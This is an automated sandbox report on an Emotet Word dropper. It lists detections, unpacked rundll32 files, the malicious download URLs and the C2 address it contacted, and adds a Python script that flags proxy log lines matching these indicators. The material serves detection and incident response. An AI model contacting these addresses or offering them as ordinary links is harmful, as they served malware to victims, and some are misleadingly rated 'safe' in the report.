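The rundll32 check walks the full ancestry rather than only the direct parent, because the graph shows several rundll32.exe generations between powershell.exe and the process that finally connects out; a parent-only rule would fire on the first hop and miss the network-active descendant. The benign control process (rundll32 under explorer.exe, port 443) produces no findings.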

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow. (Images not reproduced in this text.)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
79a2gzs3gkk.doc | 57% | Virustotal |
79a2gzs3gkk.doc | 35% | Metadefender |
79a2gzs3gkk.doc | 66% | ReversingLabs | Document-Word.Trojan.Emotet

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

All 32 unpacked PE files listed below: Detection 100%, Scanner Avira, Label HEUR/AGEN.1110387

18.2.rundll32.exe.1d0000.0.unpack
18.2.rundll32.exe.1f0000.1.unpack
16.2.rundll32.exe.210000.1.unpack
12.2.rundll32.exe.230000.1.unpack
14.2.rundll32.exe.1f0000.0.unpack
19.2.rundll32.exe.10000000.2.unpack
8.2.rundll32.exe.10000000.3.unpack
7.2.rundll32.exe.10000000.2.unpack
13.2.rundll32.exe.10000000.2.unpack
9.2.rundll32.exe.690000.1.unpack
10.2.rundll32.exe.290000.1.unpack
19.2.rundll32.exe.1f0000.1.unpack
11.2.rundll32.exe.210000.1.unpack
10.2.rundll32.exe.10000000.3.unpack
11.2.rundll32.exe.10000000.2.unpack
19.2.rundll32.exe.1d0000.0.unpack
13.2.rundll32.exe.240000.1.unpack
16.2.rundll32.exe.1f0000.0.unpack
14.2.rundll32.exe.10000000.3.unpack
7.2.rundll32.exe.1a0000.1.unpack
20.2.rundll32.exe.1d0000.1.unpack
12.2.rundll32.exe.10000000.3.unpack
15.2.rundll32.exe.1c0000.1.unpack
16.2.rundll32.exe.10000000.3.unpack
17.2.rundll32.exe.10000000.2.unpack
8.2.rundll32.exe.250000.1.unpack
20.2.rundll32.exe.10000000.2.unpack
9.2.rundll32.exe.10000000.2.unpack
18.2.rundll32.exe.10000000.3.unpack
17.2.rundll32.exe.260000.1.unpack
14.2.rundll32.exe.210000.1.unpack
15.2.rundll32.exe.10000000.2.unpack

                      Domains

Source | Detection | Scanner
silkonbusiness.matrixinfotechsolution.com | 5% | Virustotal
armakonarms.com | 7% | Virustotal
bimception.com | 2% | Virustotal
alugrama.com.mx | 2% | Virustotal

                      URLs

Several entries below (for example http://www.%s.comPA, http://ocsp.sectigo.com0, https://sectigo.com/CPS0D) are strings recovered from memory or files, including format strings and certificate fields, rather than requests observed on the wire; the Contacted URLs table further down lists the requests actually made. Long URLs appear truncated as the report shows them. Entries the report repeats verbatim are listed once.

Source | Detection | Scanner | Label
https://www.bimception.com | 0% | Avira URL Cloud | safe
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve | 100% | Avira URL Cloud | malware
https://bbjugueteria.com/s6kscx/Z/ | 100% | Avira URL Cloud | malware
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9 | 100% | Avira URL Cloud | malware
https://bbjugueteria.comh | 0% | Avira URL Cloud | safe
http://coworkingplus.es/wp-admin/FxmME/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-includes/fz/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1 | 100% | Avira URL Cloud | malware
https://armakonarms.com/wp-content/uploads/2020/11/winmark.png | 100% | Avira URL Cloud | malware
http://www.piriform.c3# | 0% | Avira URL Cloud | safe
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js | 100% | Avira URL Cloud | malware
https://armakonarms.com/brands/ | 100% | Avira URL Cloud | malware
https://armakonarms.com/iletisim/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-includes/wlwmanifest.xml | 100% | Avira URL Cloud | malware
http://armakonarms.com | 100% | Avira URL Cloud | malware
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://silkonbusiness.matrixinfotechsolu | 0% | Avira URL Cloud | safe
https://armakonarms.com/comments/feed/ | 100% | Avira URL Cloud | malware
http://silkonbusiness.matrixinfotechsolution.com | 100% | Avira URL Cloud | malware
https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9. | 100% | Avira URL Cloud | malware
http://homecass.com/wp-content/iF/P | 100% | Avira URL Cloud | malware
https://armakonarms.com/urun-kategori/pump-action-2/ | 100% | Avira URL Cloud | malware
http://homecass.com/wp-content/iF/ | 100% | Avira URL Cloud | malware
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9. | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe
http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6 | 100% | Avira URL Cloud | malware
http://alugrama.com.mx | 0% | Avira URL Cloud | safe
https://armakonarms.com/urun-kategori/short-pump-action/ | 100% | Avira URL Cloud | malware
https://armakonarms.com/feed/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0 | 100% | Avira URL Cloud | malware
https://www.bimception.comhrsZ | 0% | Avira URL Cloud | safe
https://armakonarms.com/wp-json/ | 100% | Avira URL Cloud | malware
http://coworkingplus.es | 100% | Avira URL Cloud | malware
https://armakonarms.com/urun-kategori/semi-auto/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1 | 100% | Avira URL Cloud | malware
https://armakonarms.com/ | 100% | Avira URL Cloud | malware
https://www.bimception.com/wp-admin/sHy5t/ | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://armakonarms.com/wp-content/uploads/2021/01/armakon.png | 100% | Avira URL Cloud | malware
http://silkonbusiness.matrixinfotechsolution.com/js/q26/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0 | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6 | 100% | Avira URL Cloud | malware
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl | 100% | Avira URL Cloud | malware
https://armakonarms.com/xmlrpc.php?rsd | 100% | Avira URL Cloud | malware
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
https://bbjugueteria.com | 0% | Avira URL Cloud | safe
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1 | 100% | Avira URL Cloud | malware
http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ | 0% | Avira URL Cloud | safe
http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0 | 100% | Avira URL Cloud | malware
http://alugrama.com.mx/t/2/ | 100% | Avira URL Cloud | malware
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4 | 100% | Avira URL Cloud | malware

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
silkonbusiness.matrixinfotechsolution.com | 166.62.10.32 | true | true | - | unknown
armakonarms.com | 45.143.97.183 | true | true | - | unknown
bimception.com | 162.241.224.176 | true | true | - | unknown
alugrama.com.mx | 162.241.61.203 | true | true | - | unknown
coworkingplus.es | 104.21.89.78 | true | true | - | unknown
bbjugueteria.com | 162.241.60.240 | true | true | - | unknown
www.bimception.com | unknown | unknown | true | - | unknown

                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://coworkingplus.es/wp-admin/FxmME/ | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-includes/fz/ | true | Avira URL Cloud: malware | unknown
http://silkonbusiness.matrixinfotechsolution.com/js/q26/ | true | Avira URL Cloud: malware | unknown
http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ | true | Avira URL Cloud: safe | unknown
http://alugrama.com.mx/t/2/ | true | Avira URL Cloud: malware | unknown

                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp | false | - | high
https://www.bimception.com | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://bbjugueteria.com/s6kscx/Z/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://ocsp.sectigo.com0 | powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://bbjugueteria.comh | powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://armakonarms.com/wp-content/uploads/2020/11/winmark.png | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.piriform.c3# | powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://armakonarms.com/brands/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.piriform.com/ | powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmp | false | - | high
https://armakonarms.com/iletisim/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-includes/wlwmanifest.xml | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.icra.org/vocabulary/. | rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
http://silkonbusiness.matrixinfotechsolu | powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://armakonarms.com/comments/feed/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://silkonbusiness.matrixinfotechsolution.com | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.png | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9. | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://homecass.com/wp-content/iF/P | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://armakonarms.com/urun-kategori/pump-action-2/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://homecass.com/wp-content/iF/ | powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://investor.msn.com/ | rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp | false | - | high
https://sectigo.com/CPS0D | powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9. | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.%s.comPA | powershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmp | false | URL Reputation: safe ×3 | low
http://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmp | false | - | high
http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.windows.com/pctv. | rundll32.exe, 0000000A.00000002.2135841154.0000000001F50000.00000002.00000001.sdmp | false | - | high
http://alugrama.com.mx | powershell.exe, 00000005.00000002.2098710061.0000000003B7B000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://armakonarms.com/urun-kategori/short-pump-action/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://investor.msn.com | rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp | false | - | high
https://armakonarms.com/feed/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://www.bimception.comhrsZ | powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://armakonarms.com/wp-json/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://coworkingplus.es | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://api.w.org/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | false | - | high
https://armakonarms.com/urun-kategori/semi-auto/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://armakonarms.com/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://www.bimception.com/wp-admin/sHy5t/ | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmp | false | - | high
https://armakonarms.com/wp-content/uploads/2021/01/armakon.png | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://gmpg.org/xfn/11 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | false | - | high
https://www.cloudflare.com/5xx-error-landing | powershell.exe, 00000005.00000002.2098563599.0000000003AAA000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098550728.0000000003A8E000.00000004.00000001.sdmp | false | - | high
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmp | false | - | high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000005.00000002.2094681910.00000000021D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116652511.00000000027F0000.00000002.00000001.sdmp | false | - | high
https://armakonarms.com/xmlrpc.php?rsd | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmp | false | URL Reputation: safe ×3 | unknown
https://bbjugueteria.com | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4 | powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown

                                                    Contacted IPs

(Map legend: countries shaded by share of contacted IPs: below 25%, 25% to 50%, 50% to 75%, above 75%.)

                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.60.240 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
162.241.61.203 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
195.159.28.230 | unknown | Norway | 2116 | ASN-CATCHCOM (NO) | true
162.241.224.176 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1 (US) | true
45.143.97.183 | unknown | Turkey | 25145 | TEKNOTEL-AS Teknotel Telekomunikasyon AS (TR) | true
104.21.89.78 | unknown | United States | 13335 | CLOUDFLARENET (US) | true
69.38.130.14 | unknown | United States | 26878 | TWRS-NYC (US) | true
166.62.10.32 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true
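The Contacted URLs and Contacted IPs tables above are the network indicators from this run. The script below is an added example and not part of the Joe Sandbox report: it copies those indicators into Python and classifies proxy log lines against them in tiers (exact URL, host and port, host only, bare IP). The tiering follows what the report itself shows: in the Joe Sandbox View context the same C2 endpoint 195.159.28.230:8080 appears under a different random path for every other sample, so the host and port pair is the durable indicator, and Avira URL Cloud rates that C2 URL "safe", so a reputation verdict is no substitute for matching. The log format and the log lines are constructed for this example.

```python
"""Tiered matching of proxy log lines against this report's network IOCs.

Added example, not part of the Joe Sandbox report. Indicator values are
copied from the report's Contacted URLs and Contacted IPs tables; the log
format and the log lines below are constructed for illustration.
"""
from urllib.parse import urlsplit

# Emotet stage-two download URLs requested by powershell.exe (Contacted URLs).
DROPPER_URLS = [
    "http://coworkingplus.es/wp-admin/FxmME/",
    "http://armakonarms.com/wp-includes/fz/",
    "http://silkonbusiness.matrixinfotechsolution.com/js/q26/",
    "http://alugrama.com.mx/t/2/",
]
# C2 check-in on a non-standard port; Avira URL Cloud rated this URL "safe".
C2_URLS = [
    "http://195.159.28.230:8080/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/"
    "mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/",
]
# Contacted IPs table; 69.38.130.14 has no resolved domain in the report.
CONTACTED_IPS = {
    "162.241.60.240", "162.241.61.203", "195.159.28.230", "162.241.224.176",
    "45.143.97.183", "104.21.89.78", "69.38.130.14", "166.62.10.32",
}


def host_port(url):
    """Return (hostname, port) with the scheme default filled in."""
    parts = urlsplit(url)
    default = 443 if parts.scheme == "https" else 80
    return parts.hostname, parts.port or default


def build_ioc_sets(urls=None, ips=None):
    """Precompute the lookup sets used by match_line, strongest tier first."""
    urls = DROPPER_URLS + C2_URLS if urls is None else urls
    ips = CONTACTED_IPS if ips is None else set(ips)
    exact = {u.rstrip("/") for u in urls}
    pairs = {host_port(u) for u in urls}
    # Domain names only; IP literals are handled by the weaker "ip" tier.
    hosts = {h for h, _ in pairs if h not in ips}
    return exact, pairs, hosts, ips


def match_line(line, iocs=None):
    """Classify one constructed proxy line '<ts> <client> <method> <url> <status>'.

    Returns "url" (exact dropper/C2 URL), "host_port" (same host and port,
    e.g. the C2 under a rotated path), "host" (same domain on another port or
    scheme), "ip" (a contacted IP regardless of port) or None.
    """
    exact, pairs, hosts, ips = iocs if iocs else build_ioc_sets()
    fields = line.split()
    if len(fields) < 4:
        return None
    url = fields[3]
    if url.rstrip("/") in exact:
        return "url"
    host, port = host_port(url)
    if (host, port) in pairs:
        return "host_port"
    if host in hosts:
        return "host"
    if host in ips:
        return "ip"
    return None


# Constructed log lines; the second reuses a C2 path the report lists for
# INFO.doc in its Joe Sandbox View context, not the path from this sample.
SAMPLE_LOG = [
    "2021-01-24T18:03:40Z 10.0.0.15 GET http://coworkingplus.es/wp-admin/FxmME/ 200",
    "2021-01-24T18:03:52Z 10.0.0.15 GET http://195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/ 200",
    "2021-01-24T18:04:01Z 10.0.0.22 GET https://armakonarms.com/iletisim/ 200",
    "2021-01-24T18:04:05Z 10.0.0.22 GET http://69.38.130.14/ 403",
    "2021-01-24T18:04:09Z 10.0.0.31 GET https://www.cloudflare.com/5xx-error-landing 200",
]


def scan(lines=SAMPLE_LOG):
    """Return [(url, tier)] for every line that hits an indicator."""
    iocs = build_ioc_sets()
    hits = []
    for line in lines:
        tier = match_line(line, iocs)
        if tier:
            hits.append((line.split()[3], tier))
    return hits


if __name__ == "__main__":
    for url, tier in scan():
        print(f"{tier:9} {url}")
```

A "host" tier hit deserves review rather than an automatic block: the download hosts are ordinary websites serving paths under /wp-admin/ and /wp-includes/, and the memory table shows powershell.exe pulling the regular armakonarms.com page assets alongside the payload path. The "host_port" tier on 195.159.28.230:8080 is the one worth alerting on directly, since the port is non-standard and the path changes per sample.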

                                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 343551
Start date: 24.01.2021
Start time: 18:02:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 24s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 79a2gzs3gkk.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@36/8@6/8
EGA Information:
• Successful, ratio: 93.3%
HDC Information:
• Successful, ratio: 31.6% (good quality ratio 29.4%)
• Quality average: 70.8%
• Quality standard deviation: 26.8%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 35
• Number of non-executed functions: 1
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• Execution Graph export aborted for target powershell.exe, PID 2452 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
18:03:36 | API Interceptor | 1x Sleep call for process: msg.exe modified
18:03:37 | API Interceptor | 64x Sleep call for process: powershell.exe modified
18:03:53 | API Interceptor | 325x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

Match | Associated Sample Name / URL | Detection | Context
162.241.60.240 | INFO.doc | malicious | -
195.159.28.230 | INFO.doc | malicious | 195.159.28.230:8080/u4vcbkerccn0qjbn6d/1p4m0oqpu4fiqr/mxqkk/
195.159.28.230 | DKMNT.doc | malicious | 195.159.28.230:8080/u14g/zkd6myomm2wuro5/q121fslblp4j4u7p7ny/boxgaf0or/u8p9yrywc1amf/
